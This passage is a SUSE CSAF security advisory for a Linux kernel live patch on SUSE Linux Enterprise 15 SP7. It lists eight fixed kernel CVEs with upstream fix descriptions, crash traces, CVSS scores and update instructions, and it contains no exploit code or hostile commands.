"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "moderate"
}
],
"title": "CVE-2026-23269"
}
]
}
SUSE-SU-2026:1132-1
Vulnerability from csaf_suse - Published: 2026-03-27 16:04 - Updated: 2026-03-27 16:04
Summary
Security update for the Linux Kernel (Live Patch 2 for SUSE Linux Enterprise 15 SP7)
Severity
Important
Notes
Title of the patch: Security update for the Linux Kernel (Live Patch 2 for SUSE Linux Enterprise 15 SP7)
Description of the patch:
This update for the SUSE Linux Enterprise Kernel 6.4.0-150700.53.6 fixes various security issues
The following security issues were fixed:
- CVE-2025-38488: smb: client: fix use-after-free in crypt_message when using async crypto (bsc#1247240).
- CVE-2025-40258: mptcp: fix race condition in mptcp_schedule_work() (bsc#1255053).
- CVE-2025-40284: Bluetooth: MGMT: cancel mesh send timer when hdev removed (bsc#1257669).
- CVE-2025-40297: net: bridge: fix use-after-free due to MST port state bypass (bsc#1255895).
- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255378).
- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).
- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).
- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).
Patchnames: SUSE-2026-1132,SUSE-SLE-Module-Live-Patching-15-SP7-2026-1132
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
7.8 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64 | — | | Vendor Fix |
Threats
Impact
important
7.8 (High)
7.3 (High)
7.5 (High)
7.5 (High)
References
44 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for the Linux Kernel (Live Patch 2 for SUSE Linux Enterprise 15 SP7)",
"title": "Title of the patch"
},
{
"category": "description",
"text": "\nThis update for the SUSE Linux Enterprise Kernel 6.4.0-150700.53.6 fixes various security issues\n\nThe following security issues were fixed:\n\n- CVE-2025-38488: smb: client: fix use-after-free in crypt_message when using async crypto (bsc#1247240).\n- CVE-2025-40258: mptcp: fix race condition in mptcp_schedule_work() (bsc#1255053).\n- CVE-2025-40284: Bluetooth: MGMT: cancel mesh send timer when hdev removed (bsc#1257669).\n- CVE-2025-40297: net: bridge: fix use-after-free due to MST port state bypass (bsc#1255895).\n- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255378).\n- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).\n- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).\n- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2026-1132,SUSE-SLE-Module-Live-Patching-15-SP7-2026-1132",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_1132-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:1132-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261132-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:1132-1",
"url": "https://lists.suse.com/pipermail/sle-updates/2026-March/045151.html"
},
{
"category": "self",
"summary": "SUSE Bug 1247240",
"url": "https://bugzilla.suse.com/1247240"
},
{
"category": "self",
"summary": "SUSE Bug 1255053",
"url": "https://bugzilla.suse.com/1255053"
},
{
"category": "self",
"summary": "SUSE Bug 1255378",
"url": "https://bugzilla.suse.com/1255378"
},
{
"category": "self",
"summary": "SUSE Bug 1255402",
"url": "https://bugzilla.suse.com/1255402"
},
{
"category": "self",
"summary": "SUSE Bug 1255895",
"url": "https://bugzilla.suse.com/1255895"
},
{
"category": "self",
"summary": "SUSE Bug 1256624",
"url": "https://bugzilla.suse.com/1256624"
},
{
"category": "self",
"summary": "SUSE Bug 1256644",
"url": "https://bugzilla.suse.com/1256644"
},
{
"category": "self",
"summary": "SUSE Bug 1257669",
"url": "https://bugzilla.suse.com/1257669"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38488 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38488/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40258 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40258/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40284 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40284/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40297 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40297/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68284 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68284/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68285 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68285/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68813 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71085 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71085/"
}
],
"title": "Security update for the Linux Kernel (Live Patch 2 for SUSE Linux Enterprise 15 SP7)",
"tracking": {
"current_release_date": "2026-03-27T16:04:11Z",
"generator": {
"date": "2026-03-27T16:04:11Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:1132-1",
"initial_release_date": "2026-03-27T16:04:11Z",
"revision_history": [
{
"date": "2026-03-27T16:04:11Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le",
"product": {
"name": "kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le",
"product_id": "kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x",
"product": {
"name": "kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x",
"product_id": "kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64",
"product": {
"name": "kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64",
"product_id": "kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Live Patching 15 SP7",
"product": {
"name": "SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-live-patching:15:sp7"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le as component of SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le"
},
"product_reference": "kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x as component of SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x"
},
"product_reference": "kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64 as component of SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64"
},
"product_reference": "kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP7"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-38488",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38488"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix use-after-free in crypt_message when using async crypto\n\nThe CVE-2024-50047 fix removed asynchronous crypto handling from\ncrypt_message(), assuming all crypto operations are synchronous.\nHowever, when hardware crypto accelerators are used, this can cause\nuse-after-free crashes:\n\n crypt_message()\n // Allocate the creq buffer containing the req\n creq = smb2_get_aead_req(..., \u0026req);\n\n // Async encryption returns -EINPROGRESS immediately\n rc = enc ? crypto_aead_encrypt(req) : crypto_aead_decrypt(req);\n\n // Free creq while async operation is still in progress\n kvfree_sensitive(creq, ...);\n\nHardware crypto modules often implement async AEAD operations for\nperformance. When crypto_aead_encrypt/decrypt() returns -EINPROGRESS,\nthe operation completes asynchronously. Without crypto_wait_req(),\nthe function immediately frees the request buffer, leading to crashes\nwhen the driver later accesses the freed memory.\n\nThis results in a use-after-free condition when the hardware crypto\ndriver later accesses the freed request structure, leading to kernel\ncrashes with NULL pointer dereferences.\n\nThe issue occurs because crypto_alloc_aead() with mask=0 doesn\u0027t\nguarantee synchronous operation. Even without CRYPTO_ALG_ASYNC in\nthe mask, async implementations can be selected.\n\nFix by restoring the async crypto handling:\n- DECLARE_CRYPTO_WAIT(wait) for completion tracking\n- aead_request_set_callback() for async completion notification\n- crypto_wait_req() to wait for operation completion\n\nThis ensures the request buffer isn\u0027t freed until the crypto operation\ncompletes, whether synchronous or asynchronous, while preserving the\nCVE-2024-50047 fix.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38488",
"url": "https://www.suse.com/security/cve/CVE-2025-38488"
},
{
"category": "external",
"summary": "SUSE Bug 1247239 for CVE-2025-38488",
"url": "https://bugzilla.suse.com/1247239"
},
{
"category": "external",
"summary": "SUSE Bug 1247240 for CVE-2025-38488",
"url": "https://bugzilla.suse.com/1247240"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:04:11Z",
"details": "important"
}
],
"title": "CVE-2025-38488"
},
{
"cve": "CVE-2025-40258",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40258"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: fix race condition in mptcp_schedule_work()\n\nsyzbot reported use-after-free in mptcp_schedule_work() [1]\n\nIssue here is that mptcp_schedule_work() schedules a work,\nthen gets a refcount on sk-\u003esk_refcnt if the work was scheduled.\nThis refcount will be released by mptcp_worker().\n\n[A] if (schedule_work(...)) {\n[B] sock_hold(sk);\n return true;\n }\n\nProblem is that mptcp_worker() can run immediately and complete before [B]\n\nWe need instead :\n\n sock_hold(sk);\n if (schedule_work(...))\n return true;\n sock_put(sk);\n\n[1]\nrefcount_t: addition on 0; use-after-free.\n WARNING: CPU: 1 PID: 29 at lib/refcount.c:25 refcount_warn_saturate+0xfa/0x1d0 lib/refcount.c:25\nCall Trace:\n \u003cTASK\u003e\n __refcount_add include/linux/refcount.h:-1 [inline]\n __refcount_inc include/linux/refcount.h:366 [inline]\n refcount_inc include/linux/refcount.h:383 [inline]\n sock_hold include/net/sock.h:816 [inline]\n mptcp_schedule_work+0x164/0x1a0 net/mptcp/protocol.c:943\n mptcp_tout_timer+0x21/0xa0 net/mptcp/protocol.c:2316\n call_timer_fn+0x17e/0x5f0 kernel/time/timer.c:1747\n expire_timers kernel/time/timer.c:1798 [inline]\n __run_timers kernel/time/timer.c:2372 [inline]\n __run_timer_base+0x648/0x970 kernel/time/timer.c:2384\n run_timer_base kernel/time/timer.c:2393 [inline]\n run_timer_softirq+0xb7/0x180 kernel/time/timer.c:2403\n handle_softirqs+0x22f/0x710 kernel/softirq.c:622\n __do_softirq kernel/softirq.c:656 [inline]\n run_ktimerd+0xcf/0x190 kernel/softirq.c:1138\n smpboot_thread_fn+0x542/0xa60 kernel/smpboot.c:160\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40258",
"url": "https://www.suse.com/security/cve/CVE-2025-40258"
},
{
"category": "external",
"summary": "SUSE Bug 1254843 for CVE-2025-40258",
"url": "https://bugzilla.suse.com/1254843"
},
{
"category": "external",
"summary": "SUSE Bug 1255053 for CVE-2025-40258",
"url": "https://bugzilla.suse.com/1255053"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:04:11Z",
"details": "important"
}
],
"title": "CVE-2025-40258"
},
{
"cve": "CVE-2025-40284",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40284"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: MGMT: cancel mesh send timer when hdev removed\n\nmesh_send_done timer is not canceled when hdev is removed, which causes\ncrash if the timer triggers after hdev is gone.\n\nCancel the timer when MGMT removes the hdev, like other MGMT timers.\n\nShould fix the BUG: sporadically seen by BlueZ test bot\n(in \"Mesh - Send cancel - 1\" test).\n\nLog:\n------\nBUG: KASAN: slab-use-after-free in run_timer_softirq+0x76b/0x7d0\n...\nFreed by task 36:\n kasan_save_stack+0x24/0x50\n kasan_save_track+0x14/0x30\n __kasan_save_free_info+0x3a/0x60\n __kasan_slab_free+0x43/0x70\n kfree+0x103/0x500\n device_release+0x9a/0x210\n kobject_put+0x100/0x1e0\n vhci_release+0x18b/0x240\n------",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40284",
"url": "https://www.suse.com/security/cve/CVE-2025-40284"
},
{
"category": "external",
"summary": "SUSE Bug 1254860 for CVE-2025-40284",
"url": "https://bugzilla.suse.com/1254860"
},
{
"category": "external",
"summary": "SUSE Bug 1257669 for CVE-2025-40284",
"url": "https://bugzilla.suse.com/1257669"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:04:11Z",
"details": "important"
}
],
"title": "CVE-2025-40284"
},
{
"cve": "CVE-2025-40297",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40297"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: bridge: fix use-after-free due to MST port state bypass\n\nsyzbot reported[1] a use-after-free when deleting an expired fdb. It is\ndue to a race condition between learning still happening and a port being\ndeleted, after all its fdbs have been flushed. The port\u0027s state has been\ntoggled to disabled so no learning should happen at that time, but if we\nhave MST enabled, it will bypass the port\u0027s state, that together with VLAN\nfiltering disabled can lead to fdb learning at a time when it shouldn\u0027t\nhappen while the port is being deleted. VLAN filtering must be disabled\nbecause we flush the port VLANs when it\u0027s being deleted which will stop\nlearning. This fix adds a check for the port\u0027s vlan group which is\ninitialized to NULL when the port is getting deleted, that avoids the port\nstate bypass. When MST is enabled there would be a minimal new overhead\nin the fast-path because the port\u0027s vlan group pointer is cache-hot.\n\n[1] https://syzkaller.appspot.com/bug?extid=dd280197f0f7ab3917be",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40297",
"url": "https://www.suse.com/security/cve/CVE-2025-40297"
},
{
"category": "external",
"summary": "SUSE Bug 1255187 for CVE-2025-40297",
"url": "https://bugzilla.suse.com/1255187"
},
{
"category": "external",
"summary": "SUSE Bug 1255895 for CVE-2025-40297",
"url": "https://bugzilla.suse.com/1255895"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:04:11Z",
"details": "important"
}
],
"title": "CVE-2025-40297"
},
{
"cve": "CVE-2025-68284",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68284"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: prevent potential out-of-bounds writes in handle_auth_session_key()\n\nThe len field originates from untrusted network packets. Boundary\nchecks have been added to prevent potential out-of-bounds writes when\ndecrypting the connection secret or processing service tickets.\n\n[ idryomov: changelog ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68284",
"url": "https://www.suse.com/security/cve/CVE-2025-68284"
},
{
"category": "external",
"summary": "SUSE Bug 1255377 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255377"
},
{
"category": "external",
"summary": "SUSE Bug 1255378 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255378"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.3,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_6-default-11-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:04:11Z",
"details": "important"
}
],
"title": "CVE-2025-68284"
},
{
"cve": "CVE-2025-68285",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68285"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: fix potential use-after-free in have_mon_and_osd_map()\n\nThe wait loop in __ceph_open_session() can race with the client\nreceiving a new monmap or osdmap shortly after the initial map is\nreceived. Both ceph_monc_handle_map() and handle_one_map() install\na new map immediately after freeing the old one\n\n kfree(monc-\u003emonmap);\n monc-\u003emonmap = monmap;\n\n ceph_osdmap_destroy(osdc-\u003eosdmap);\n osdc-\u003eosdmap = newmap;\n\nunder client-\u003emonc.mutex and client-\u003eosdc.lock respectively, but\nbecause neither is taken in have_mon_and_osd_map() it\u0027s possible for\nclient-\u003emonc.monmap-\u003eepoch and client-\u003eosdc.osdmap-\u003eepoch arms in\n\n client-\u003emonc.monmap \u0026\u0026 client-\u003emonc.monmap-\u003eepoch \u0026\u0026\n client-\u003eosdc.osdmap \u0026\u0026 client-\u003eosdc.osdmap-\u003eepoch;\n\ncondition to dereference an already freed map. This happens to be\nreproducible with generic/395 and generic/397 with KASAN enabled:\n\n BUG: KASAN: slab-use-after-free in have_mon_and_osd_map+0x56/0x70\n Read of size 4 at addr ffff88811012d810 by task mount.ceph/13305\n CPU: 2 UID: 0 PID: 13305 Comm: mount.ceph Not tainted 6.14.0-rc2-build2+ #1266\n ...\n Call Trace:\n \u003cTASK\u003e\n have_mon_and_osd_map+0x56/0x70\n ceph_open_session+0x182/0x290\n ceph_get_tree+0x333/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n \u003c/TASK\u003e\n\n Allocated by task 13305:\n ceph_osdmap_alloc+0x16/0x130\n ceph_osdc_init+0x27a/0x4c0\n ceph_create_client+0x153/0x190\n create_fs_client+0x50/0x2a0\n 